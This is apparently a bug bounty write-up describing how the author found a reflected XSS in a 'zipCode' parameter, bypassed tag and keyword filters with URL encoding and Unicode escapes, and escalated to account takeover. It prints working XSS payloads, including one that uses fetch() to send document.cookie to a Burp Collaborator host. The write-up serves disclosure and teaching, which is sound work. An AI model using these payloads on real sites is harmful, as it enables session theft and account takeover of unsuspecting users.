First Part — Find r-XSS

I worked on a public program on Hacker1 and decided to focus on a subdomain. I chose a subdomain and started working on it..

I wanted to find all the directories of the site, so I did it using JavaScript code. This code crawled the entire site for me..

after use JavaScript code I found the /id path in Website:

subdomain.target.tld/id

Then, as usual, I crawled parameters using tools like GAP and fAllParam and checked them. I also used the x8 tool and found a reflected parameter. I discovered the zipCode parameter and tested it on the website:

subdomain.target.tld/id?zipCode=aurora

After that, I saw aurora in the source code, and it was reflected. I then tried injecting JavaScript code to a pop-up alert.…

Second Part — Pop-Up alert

After that, I noticed the reflection and tried injecting JavaScript code for a pop-up alert. However, certain tags and words like <script>, <iframe>, <svg>, etc., were filtered. So, I decided to bypass the restriction. I tested my test cases for bypassing reflected XSS (r-XSS) and used URL encoding along with the <img> tag to trigger a pop-up alert. You can see the bypass below.:

subdomain.target.tld/id?zipCode=aurora%27%23%22%3C/html%3E%22%3E--%3E%3Cimg%20src%3Dx%20onerror%3D%22alert(origin)%22%3E

I used that payload, but the WAF caught me… 😂 I noticed that alert was also filtered, so I used Unicode in onerror instead.

aurora%27%23%22%3C/html%3E%22%3E--%3E%3Cimg%20src%3Dx%20onerror%3D%22%5Cu0061lert(origin)%22%3E

BOOOOOM We have r-XSS right now and my payload was inject and bypass alert with Unicode : \0061lert() = alert()

Third Part — Account Takeover

Getting an XSS was great, but it wasn’t enough for me — I wanted an Account Takeover (ATO). Escalating the impact was my next goal. To achieve that, I needed to steal authenticated cookies, replace them with my own, and log in as the victim.

So, what was the plan? Simple:

1. Write a payload to exfiltrate the victim’s session.
2. Package it into a working Proof of Concept (PoC).
3. Deliver it to the target.
4. Profit.

I wrote the exploit, set up a listener on my Burp Collabration, and tested the exploit on myself. It worked perfectly. I had successfully escalated the XSS to an Account Takeover (ATO). With the exploit functioning as expected, I crafted a detailed report, attached all the proof of concepts (POCs), and submitted it.

My payload for exploit:

subdomain.target.tld/id?zipCode=aurora%27%23%22%3C/html%3E%3Cimg%20src%3Dx+encodeURIComponent(document.cookie)%20onerror%3D%22fetch(%27https://[BURP-COLLAB-ID]/%27%2bencodeURIComponent(document.cookie))%22%3E

You may ask why did you use encodeURIComponent()?

in JavaScript is used to encode a URI component by replacing special characters with their percent-encoded equivalents. This ensures that the component can be safely included in a URL, And I did this to receive cookies better 🙂

You send the payload to the victim, and when the victim clicks on the link, their cookies will be sent to you, as shown in the picture:

Sorry, I can’t show the continuation of the cookies, but it’s like this, right now I have victim cookie’s and full ATO:)

So I reported the bug in Hacker1 and I think after 3 hours my bug triaged.

Thank you for reading my writeup and I hope you enjoyed it.

If you like you can follow me on X (maybe twitter😂): Mahan